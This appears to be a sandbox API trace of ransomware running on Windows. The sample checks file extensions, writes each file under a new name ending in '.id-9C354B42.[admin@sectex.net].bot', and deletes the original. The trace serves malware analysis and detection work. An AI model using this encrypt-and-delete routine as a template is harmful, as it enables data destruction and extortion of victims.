	[0044.735] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0044.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75
	[0044.735] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75
	[0044.736] lstrlenW (lpString=".doc") returned 4
	[0044.736] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0044.736] lstrlenW (lpString=".docx") returned 5
	[0044.736] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0044.736] lstrlenW (lpString=".pdf") returned 4
	[0044.736] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0044.736] lstrlenW (lpString=".xls") returned 4
	[0044.736] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0044.736] lstrlenW (lpString=".xlsx") returned 5
	[0044.736] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0044.736] lstrlenW (lpString=".ppt") returned 4
	[0044.736] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0044.736] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75
	[0044.736] lstrlenW (lpString=".zip") returned 4
	[0044.736] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0044.736] lstrlenW (lpString=".rar") returned 4
	[0044.736] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0044.736] lstrlenW (lpString=".bz2") returned 4
	[0044.736] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0044.736] lstrlenW (lpString=".7z") returned 3
	[0044.736] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0044.736] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75
	[0044.736] lstrlenW (lpString=".dbf") returned 4
	[0044.736] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0044.736] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75
	[0044.736] lstrlenW (lpString=".1cd") returned 4
	[0044.736] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0044.736] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75
	[0044.736] lstrlenW (lpString=".jpg") returned 4
	[0044.736] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0044.737] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0044.737] lstrlenW (lpString="dwintl20.dll") returned 12
	[0044.737] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.737] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=107912) returned 1
	[0044.737] CloseHandle (hObject=0x1a8) returned 1
	[0044.737] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll")) returned 0x2020
	[0044.738] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.738] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0044.738] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.738] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.738] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0044.738] GetLastError () returned 0x0
	[0044.738] ReadFile (in: hFile=0x1a8, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x1a588, lpOverlapped=0x0) returned 1
	[0044.903] WriteFile (in: hFile=0x21c, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x1a590, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x1a590, lpOverlapped=0x0) returned 1
	[0044.905] ReadFile (in: hFile=0x1a8, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.905] WriteFile (in: hFile=0x21c, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0044.905] SetEndOfFile (hFile=0x21c) returned 1
	[0044.905] CloseHandle (hObject=0x21c) returned 1
	[0044.906] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.906] SetEndOfFile (hFile=0x1a8) returned 1
	[0044.907] CloseHandle (hObject=0x1a8) returned 1
	[0044.907] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0044.907] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll")) returned 1
	[0044.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80
	[0044.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80
	[0044.908] lstrlenW (lpString=".doc") returned 4
	[0044.908] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0044.908] lstrlenW (lpString=".docx") returned 5
	[0044.908] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1
	[0044.908] lstrlenW (lpString=".pdf") returned 4
	[0044.908] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0044.908] lstrlenW (lpString=".xls") returned 4
	[0044.908] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0044.908] lstrlenW (lpString=".xlsx") returned 5
	[0044.908] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1
	[0044.908] lstrlenW (lpString=".ppt") returned 4
	[0044.908] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0044.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80
	[0044.908] lstrlenW (lpString=".zip") returned 4
	[0044.908] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0044.908] lstrlenW (lpString=".rar") returned 4
	[0044.908] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0044.908] lstrlenW (lpString=".bz2") returned 4
	[0044.908] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0044.908] lstrlenW (lpString=".7z") returned 3
	[0044.908] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0044.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80
	[0044.908] lstrlenW (lpString=".dbf") returned 4
	[0044.908] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0044.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80
	[0044.908] lstrlenW (lpString=".1cd") returned 4
	[0044.908] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0044.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80
	[0044.908] lstrlenW (lpString=".jpg") returned 4
	[0044.908] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0044.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80
	[0044.908] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80
	[0044.908] lstrlenW (lpString=".doc") returned 4
	[0044.909] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0044.909] lstrlenW (lpString=".docx") returned 5
	[0044.909] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1
	[0044.909] lstrlenW (lpString=".pdf") returned 4
	[0044.909] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0044.909] lstrlenW (lpString=".xls") returned 4
	[0044.909] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0044.909] lstrlenW (lpString=".xlsx") returned 5
	[0044.909] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1
	[0044.909] lstrlenW (lpString=".ppt") returned 4
	[0044.909] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0044.909] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80
	[0044.909] lstrlenW (lpString=".zip") returned 4
	[0044.909] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0044.909] lstrlenW (lpString=".rar") returned 4
	[0044.909] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0044.909] lstrlenW (lpString=".bz2") returned 4
	[0044.909] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0044.909] lstrlenW (lpString=".7z") returned 3
	[0044.909] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0044.909] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80
	[0044.909] lstrlenW (lpString=".dbf") returned 4
	[0044.909] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0044.909] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80
	[0044.909] lstrlenW (lpString=".1cd") returned 4
	[0044.909] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0044.909] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80
	[0044.909] lstrlenW (lpString=".jpg") returned 4
	[0044.909] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0044.909] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0044.910] lstrlenW (lpString="dwdcw20.dll") returned 11
	[0044.910] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0044.954] GetFileSizeEx (in: hFile=0x200, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=526176) returned 1
	[0044.954] CloseHandle (hObject=0x200) returned 1
	[0044.954] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll")) returned 0x2020
	[0044.954] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.954] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0044.954] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.954] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.954] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0044.955] GetLastError () returned 0x0
	[0044.955] ReadFile (in: hFile=0x200, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x80760, lpOverlapped=0x0) returned 1
	[0044.966] WriteFile (in: hFile=0x1f0, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x80770, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x80770, lpOverlapped=0x0) returned 1
	[0044.978] ReadFile (in: hFile=0x200, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.978] WriteFile (in: hFile=0x1f0, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0044.978] SetEndOfFile (hFile=0x1f0) returned 1
	[0044.978] CloseHandle (hObject=0x1f0) returned 1
	[0044.978] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.978] SetEndOfFile (hFile=0x200) returned 1
	[0044.983] CloseHandle (hObject=0x200) returned 1
	[0044.984] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0044.984] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll")) returned 1
	[0044.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74
	[0044.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74
	[0044.984] lstrlenW (lpString=".doc") returned 4
	[0044.984] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0044.984] lstrlenW (lpString=".docx") returned 5
	[0044.984] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1
	[0044.984] lstrlenW (lpString=".pdf") returned 4
	[0044.984] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0044.984] lstrlenW (lpString=".xls") returned 4
	[0044.984] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0044.984] lstrlenW (lpString=".xlsx") returned 5
	[0044.984] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1
	[0044.984] lstrlenW (lpString=".ppt") returned 4
	[0044.984] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0044.984] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74
	[0044.984] lstrlenW (lpString=".zip") returned 4
	[0044.984] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0044.984] lstrlenW (lpString=".rar") returned 4
	[0044.985] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0044.985] lstrlenW (lpString=".bz2") returned 4
	[0044.985] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0044.985] lstrlenW (lpString=".7z") returned 3
	[0044.985] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0044.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74
	[0044.985] lstrlenW (lpString=".dbf") returned 4
	[0044.985] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0044.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74
	[0044.985] lstrlenW (lpString=".1cd") returned 4
	[0044.985] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0044.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74
	[0044.985] lstrlenW (lpString=".jpg") returned 4
	[0044.985] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0044.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74
	[0044.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74
	[0044.985] lstrlenW (lpString=".doc") returned 4
	[0044.985] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0044.985] lstrlenW (lpString=".docx") returned 5
	[0044.985] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1
	[0044.985] lstrlenW (lpString=".pdf") returned 4
	[0044.985] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0044.985] lstrlenW (lpString=".xls") returned 4
	[0044.985] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0044.985] lstrlenW (lpString=".xlsx") returned 5
	[0044.985] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1
	[0044.985] lstrlenW (lpString=".ppt") returned 4
	[0044.985] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0044.985] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74
	[0044.985] lstrlenW (lpString=".zip") returned 4
	[0044.985] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0044.985] lstrlenW (lpString=".rar") returned 4
	[0044.986] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0044.986] lstrlenW (lpString=".bz2") returned 4
	[0044.986] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0044.986] lstrlenW (lpString=".7z") returned 3
	[0044.986] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0044.986] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74
	[0044.986] lstrlenW (lpString=".dbf") returned 4
	[0044.986] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0044.986] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74
	[0044.986] lstrlenW (lpString=".1cd") returned 4
	[0044.986] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0044.986] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74
	[0044.986] lstrlenW (lpString=".jpg") returned 4
	[0044.986] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0044.986] lstrcmpiW (lpString1=".manifest", lpString2=".bot") returned 1
	[0044.986] lstrlenW (lpString="Microsoft.VC90.CRT.manifest") returned 27
	[0044.986] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0044.986] GetFileSizeEx (in: hFile=0x200, lpFileSize=0xa55ff1c | out: lpFileSize=0xa55ff1c*=1857) returned 1
	[0044.986] CloseHandle (hObject=0x200) returned 1
	[0044.987] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest")) returned 0x2020
	[0044.987] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.987] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0044.987] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.987] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.987] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0044.987] GetLastError () returned 0x0
	[0044.987] ReadFile (in: hFile=0x200, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x741, lpOverlapped=0x0) returned 1
	[0044.989] WriteFile (in: hFile=0x1f0, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x750, lpOverlapped=0x0) returned 1
	[0044.989] ReadFile (in: hFile=0x200, lpBuffer=0xb0b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa55fed4, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesRead=0xa55fed4*=0x0, lpOverlapped=0x0) returned 1
	[0044.990] WriteFile (in: hFile=0x1f0, lpBuffer=0xb0b0020*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0xa55fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb0b0020*, lpNumberOfBytesWritten=0xa55fc9c*=0x10a, lpOverlapped=0x0) returned 1
	[0044.990] SetEndOfFile (hFile=0x1f0) returned 1
	[0044.990] CloseHandle (hObject=0x1f0) returned 1
	[0044.990] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa55fec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.990] SetEndOfFile (hFile=0x200) returned 1
	[0044.991] CloseHandle (hObject=0x200) returned 1
	[0044.991] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0044.991] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest")) returned 1
	[0044.991] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90
	[0044.991] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 90
	[0044.991] lstrlenW (lpString=".doc") returned 4
	[0044.991] lstrcmpiW (lpString1=".doc", lpString2="fest") returned -1
	[0044.991] lstrlenW (lpString=".docx") returned 5
	[0044.991] lstrcmpiW (lpString1=".docx", lpString2="ifest") returned -1
	[0044.991] lstrlenW (lpString=".pdf") returned 4
	[0044.992] lstrcmpiW (lpString1=".pdf", lpString2="fest") returned -1
	[0044.992] lstrlenW (lpString=".xls") returned 4
	[0044.992] lstrcmpiW (lpString1=".xls", lpString2="fest") returned -1
	[0044.992] lstrlenW (lpString=".xlsx") returned 5
	[0044.992] lstrcmpiW (lpString1=".xlsx", lpString2="ifest") returned -1
	[0044.992] lstrlenW (lpString=".ppt") returned 4
	[0044.992] lstrcmpiW (lpString1=".ppt", lpString2="fest") returned -1
